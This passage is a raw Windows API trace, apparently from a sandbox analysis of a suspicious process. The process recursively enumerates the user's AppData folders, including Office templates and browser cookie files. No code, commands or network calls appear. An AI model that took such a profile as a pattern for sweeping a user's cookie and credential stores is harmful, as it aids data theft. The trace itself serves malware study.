pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\*" [0083.544] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.544] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed", pszFile="Access Parts" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Access Parts") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Access Parts" [0083.544] PathCombineW (in: pszDest=0x18c988, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Access Parts", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Access Parts\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Access Parts\\*" [0083.544] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Access Parts\\*", lpFindFileData=0x18c738 | out: lpFindFileData=0x18c738) returned 0x586ca0 [0083.544] PathCombineW (in: pszDest=0x18c988, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Access Parts", pszFile="1033" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Access Parts\\1033") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Access Parts\\1033" [0083.544] PathCombineW (in: pszDest=0x18c500, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Access Parts\\1033", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Access Parts\\1033\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Access Parts\\1033\\*" [0083.544] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Access Parts\\1033\\*", lpFindFileData=0x18c2b0 | out: lpFindFileData=0x18c2b0) returned 0x586ce0 [0083.544] FindClose (in: hFindFile=0x586ce0 | out: hFindFile=0x586ce0) returned 1 [0083.544] FindClose (in: hFindFile=0x586ca0 | out: hFindFile=0x586ca0) returned 1 [0083.544] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed", pszFile="Document Themes" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes" [0083.544] PathCombineW (in: pszDest=0x18c988, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\*" [0083.544] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\*", lpFindFileData=0x18c738 | out: lpFindFileData=0x18c738) returned 0x586ca0 [0083.545] PathCombineW (in: pszDest=0x18c988, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes", pszFile="1033" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033" [0083.545] PathCombineW (in: pszDest=0x18c500, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\*" [0083.545] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\*", lpFindFileData=0x18c2b0 | out: lpFindFileData=0x18c2b0) returned 0x586ce0 [0083.545] FindClose (in: hFindFile=0x586ce0 | out: hFindFile=0x586ce0) returned 1 [0083.545] FindClose (in: hFindFile=0x586ca0 | out: hFindFile=0x586ca0) returned 1 [0083.545] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.545] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16", pszFile="User" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User" [0083.545] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\*" [0083.545] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.545] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User", pszFile="Document Themes" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes" [0083.545] PathCombineW (in: pszDest=0x18c988, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\*" [0083.545] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\*", lpFindFileData=0x18c738 | out: lpFindFileData=0x18c738) returned 0x586ca0 [0083.545] PathCombineW (in: pszDest=0x18c988, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes", pszFile="1033" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033" [0083.546] PathCombineW (in: pszDest=0x18c500, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\*" [0083.546] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\*", lpFindFileData=0x18c2b0 | out: lpFindFileData=0x18c2b0) returned 0x586ce0 [0083.546] FindClose (in: hFindFile=0x586ce0 | out: hFindFile=0x586ce0) returned 1 [0083.546] FindClose (in: hFindFile=0x586ca0 | out: hFindFile=0x586ca0) returned 1 [0083.546] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.546] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.546] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.546] PathMatchSpecW (pszFile="Normal.dotm", pszSpec="*") returned 1 [0083.546] PathMatchSpecW (pszFile="~$Normal.dotm", pszSpec="*") returned 1 [0083.546] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.546] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="UProof" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\UProof") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\UProof" [0083.546] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\UProof", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\UProof\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\UProof\\*" [0083.546] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\UProof\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.546] PathMatchSpecW (pszFile="CUSTOM.DIC", pszSpec="*") returned 1 [0083.546] PathMatchSpecW (pszFile="ExcludeDictionaryEN0409.lex", pszSpec="*") returned 1 [0083.546] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.546] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Windows" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows" [0083.546] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\*" [0083.546] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.546] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Cookies" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies" [0083.546] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\*" [0083.547] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.547] PathMatchSpecW (pszFile="aetadzjz@g.live[1].txt", pszSpec="*") returned 1 [0083.547] PathMatchSpecW (pszFile="aetadzjz@google[2].txt", pszSpec="*") returned 1 [0083.547] PathMatchSpecW (pszFile="aetadzjz@live[1].txt", pszSpec="*") returned 1 [0083.547] PathMatchSpecW (pszFile="index.dat", pszSpec="*") returned 1 [0083.547] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies", pszFile="Low" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low" [0083.547] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\*" [0083.547] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.547] PathMatchSpecW (pszFile="aetadzjz@ad.360yield[2].txt", pszSpec="*") returned 1 [0083.547] PathMatchSpecW (pszFile="aetadzjz@ad13.adfarm1.adition[2].txt", pszSpec="*") returned 1 [0083.548] PathMatchSpecW (pszFile="aetadzjz@addthis[2].txt", pszSpec="*") returned 1 [0083.548] PathMatchSpecW (pszFile="aetadzjz@adfarm1.adition[2].txt", pszSpec="*") returned 1 [0083.548] PathMatchSpecW (pszFile="aetadzjz@adformdsp[2].txt", pszSpec="*") returned 1 [0083.548] PathMatchSpecW (pszFile="aetadzjz@adform[2].txt", pszSpec="*") returned 1 [0083.548] PathMatchSpecW (pszFile="aetadzjz@adnxs[2].txt", pszSpec="*") returned 1 [0083.548] PathMatchSpecW (pszFile="aetadzjz@adscale[1].txt", pszSpec="*") returned 1 [0083.548] PathMatchSpecW (pszFile="aetadzjz@adserving.ancoraplatform[2].txt", pszSpec="*") returned 1 [0083.548] PathMatchSpecW (pszFile="aetadzjz@adsrvr[1].txt", pszSpec="*") returned 1 [0083.548] PathMatchSpecW (pszFile="aetadzjz@adtech[2].txt", pszSpec="*") returned 1 [0083.548] PathMatchSpecW (pszFile="aetadzjz@advertising[1].txt", pszSpec="*") returned 1 [0083.548] PathMatchSpecW (pszFile="aetadzjz@angsrvr[2].txt", pszSpec="*") returned 1 [0083.548] PathMatchSpecW (pszFile="aetadzjz@api.bing[2].txt", pszSpec="*") returned 1 [0083.548] PathMatchSpecW (pszFile="aetadzjz@at.atwola[2].txt", pszSpec="*") returned 1 [0083.548] PathMatchSpecW (pszFile="aetadzjz@bidswitch[1].txt", pszSpec="*") returned 1 [0083.548] PathMatchSpecW (pszFile="aetadzjz@bing[1].txt", pszSpec="*") returned 1 [0083.548] PathMatchSpecW (pszFile="aetadzjz@bluekai[1].txt", pszSpec="*") returned 1 [0083.548] PathMatchSpecW (pszFile="aetadzjz@bs.serving-sys[1].txt", pszSpec="*") returned 1 [0083.548] PathMatchSpecW (pszFile="aetadzjz@bs.serving-sys[3].txt", pszSpec="*") returned 1 [0083.548] PathMatchSpecW (pszFile="aetadzjz@c.bing[1].txt", pszSpec="*") returned 1 [0083.548] PathMatchSpecW (pszFile="aetadzjz@c.msn[2].txt", pszSpec="*") returned 1 [0083.548] PathMatchSpecW (pszFile="aetadzjz@c1.microsoft[2].txt", pszSpec="*") returned 1 [0083.548] PathMatchSpecW (pszFile="aetadzjz@casalemedia[2].txt", pszSpec="*") returned 1 [0083.548] PathMatchSpecW (pszFile="aetadzjz@connextra[2].txt", pszSpec="*") returned 1 [0083.548] PathMatchSpecW (pszFile="aetadzjz@crwdcntrl[1].txt", pszSpec="*") returned 1 [0083.548] PathMatchSpecW (pszFile="aetadzjz@demdex[1].txt", pszSpec="*") returned 1 [0083.549] PathMatchSpecW (pszFile="aetadzjz@doubleclick[2].txt", pszSpec="*") returned 1 [0083.549] PathMatchSpecW (pszFile="aetadzjz@dpm.demdex[1].txt", pszSpec="*") returned 1 [0083.549] PathMatchSpecW (pszFile="aetadzjz@exelator[1].txt", pszSpec="*") returned 1 [0083.549] PathMatchSpecW (pszFile="aetadzjz@eyeota[1].txt", pszSpec="*") returned 1 [0083.549] PathMatchSpecW (pszFile="aetadzjz@google[2].txt", pszSpec="*") returned 1 [0083.549] PathMatchSpecW (pszFile="aetadzjz@ibeu2.mookie1[2].txt", pszSpec="*") returned 1 [0083.549] PathMatchSpecW (pszFile="aetadzjz@ih.adscale[1].txt", pszSpec="*") returned 1 [0083.549] PathMatchSpecW (pszFile="aetadzjz@linkedin[2].txt", pszSpec="*") returned 1 [0083.549] PathMatchSpecW (pszFile="aetadzjz@m.exactag[2].txt", pszSpec="*") returned 1 [0083.549] PathMatchSpecW (pszFile="aetadzjz@mathtag[2].txt", pszSpec="*") returned 1 [0083.549] PathMatchSpecW (pszFile="aetadzjz@microsoft[1].txt", pszSpec="*") returned 1 [0083.549] PathMatchSpecW (pszFile="aetadzjz@msn[2].txt", pszSpec="*") returned 1 [0083.549] PathMatchSpecW (pszFile="aetadzjz@openx[1].txt", pszSpec="*") returned 1 [0083.549] PathMatchSpecW (pszFile="aetadzjz@pixel.rubiconproject[1].txt", pszSpec="*") returned 1 [0083.549] PathMatchSpecW (pszFile="aetadzjz@pubmatic[2].txt", pszSpec="*") returned 1 [0083.549] PathMatchSpecW (pszFile="aetadzjz@rubiconproject[1].txt", pszSpec="*") returned 1 [0083.549] PathMatchSpecW (pszFile="aetadzjz@scorecardresearch[2].txt", pszSpec="*") returned 1 [0083.549] PathMatchSpecW (pszFile="aetadzjz@semasio[1].txt", pszSpec="*") returned 1 [0083.549] PathMatchSpecW (pszFile="aetadzjz@server.adformdsp[2].txt", pszSpec="*") returned 1 [0083.549] PathMatchSpecW (pszFile="aetadzjz@serving-sys[2].txt", pszSpec="*") returned 1 [0083.549] PathMatchSpecW (pszFile="aetadzjz@serving.experianmarketingservices[1].txt", pszSpec="*") returned 1 [0083.549] PathMatchSpecW (pszFile="aetadzjz@smartadserver[1].txt", pszSpec="*") returned 1 [0083.549] PathMatchSpecW (pszFile="aetadzjz@tapad[2].txt", pszSpec="*") returned 1 [0083.549] PathMatchSpecW (pszFile="aetadzjz@track.adform[2].txt", pszSpec="*") returned 1 [0083.549] PathMatchSpecW (pszFile="aetadzjz@turn[1].txt", pszSpec="*") returned 1 [0083.549] PathMatchSpecW (pszFile="aetadzjz@w55c[2].txt", pszSpec="*") returned 1 [0083.549] PathMatchSpecW (pszFile="aetadzjz@www.bing[1].txt", pszSpec="*") returned 1 [0083.549] PathMatchSpecW (pszFile="aetadzjz@www.linkedin[1].txt", pszSpec="*") returned 1 [0083.549] PathMatchSpecW (pszFile="aetadzjz@www.msn[2].txt", pszSpec="*") returned 1 [0083.549] PathMatchSpecW (pszFile="index.dat", pszSpec="*") returned 1 [0083.549] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.550] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.550] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows", pszFile="IECompatCache" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache" [0083.550] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\*" [0083.550] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.550] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache", pszFile="Low" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low" [0083.550] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\*" [0083.550] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.550] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.550] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.550] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows", pszFile="IETldCache" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache" [0083.550] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\*" [0083.551] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.551] PathMatchSpecW (pszFile="index.dat", pszSpec="*") returned 1 [0083.551] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache", pszFile="Low" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\Low") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\Low" [0083.551] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\Low", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\Low\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\Low\\*" [0083.551] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\Low\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.551] PathMatchSpecW (pszFile="index.dat", pszSpec="*") returned 1 [0083.551] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.551] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.551] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Libraries" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries" [0083.551] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\*" [0083.551] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.551] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*") returned 1 [0083.551] PathMatchSpecW (pszFile="Documents.library-ms", pszSpec="*") returned 1 [0083.551] PathMatchSpecW (pszFile="Music.library-ms", pszSpec="*") returned 1 [0083.551] PathMatchSpecW (pszFile="Pictures.library-ms", pszSpec="*") returned 1 [0083.551] PathMatchSpecW (pszFile="Videos.library-ms", pszSpec="*") returned 1 [0083.551] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.551] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Network Shortcuts" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts" [0083.551] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\*" [0083.551] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.551] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.552] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Printer Shortcuts" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts" [0083.552] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\*" [0083.552] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.552] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.552] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows", pszFile="PrivacIE" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE" [0083.552] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\*" [0083.552] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\*", lpFindFileData=0x18d4d0 | out: 